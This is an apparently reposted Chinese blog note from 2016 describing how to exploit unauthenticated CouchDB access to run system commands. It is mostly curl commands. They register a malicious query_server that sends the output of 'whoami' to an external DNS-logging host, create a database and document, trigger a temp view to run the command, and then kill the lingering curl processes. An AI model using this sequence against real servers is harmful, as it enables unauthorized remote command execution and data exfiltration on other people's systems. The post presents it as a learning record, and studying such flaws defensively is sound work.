内容简介:Couchdb未授权访问可执行系统命令(利用cloudeye神器回显)
前几天booooom在群里发了个couchdb执行系统命令的word
学习了一下,记录下
新增query_server配置,这里执行curl+回显whoami命令
Curl -X PUT 'http://xx.xx.xxx.xx:5984/_config/query_servers/cmd' -d '"curl couchdb.334cf9.dnslog.info/?whoami=`whoami`"'
新建一个临时表,插入一条记录
curl -X PUT 'http://xx.xx.xxx.xx:5984/testdb'
curl -X PUT 'http://xx.xx.xxx.xx:5984/testdb/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
调用query_server处理数据
curl -X POST 'http://xx.xx.xxx.xx:5984/testdb/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
调用之后,一直在请求,我直接提前结束请求了,因为我要去执行pkill命令k掉curl进程...不然会一直请求...会产生很多日志...
因为执行之后curl命令也会在后台一直请求,所以要K掉
Curl -X PUT 'http://xx.xx.xxx.xx:5984/_config/query_servers/cmd' -d '"pkill -9 curl"'
最后效果如下
后面跟大表哥@Salime讨论了很久,发现新建表不能写入特殊符号,以及插入数据不可控,所以不可控,导致不能回显,或者说暂时没有找到很好的回显办法,现在只能算是隐式命令执行...如果你有好的办法回显结果,可以评论或者加我qq934817794聊聊...
最后由 admin 编辑于2016年05月22日 00:39
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- 命令行神器 Click 快速上手
- 数据库操作命令行神器:mycli
- 堪称神器的命令行工具系列之 curl
- 操作数据库的命令行神器:mycli
- 提升开发效率 N 倍的 20+ 命令行神器(附 demo)
- 推荐九个堪称神器的命令行工具给程序员们
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
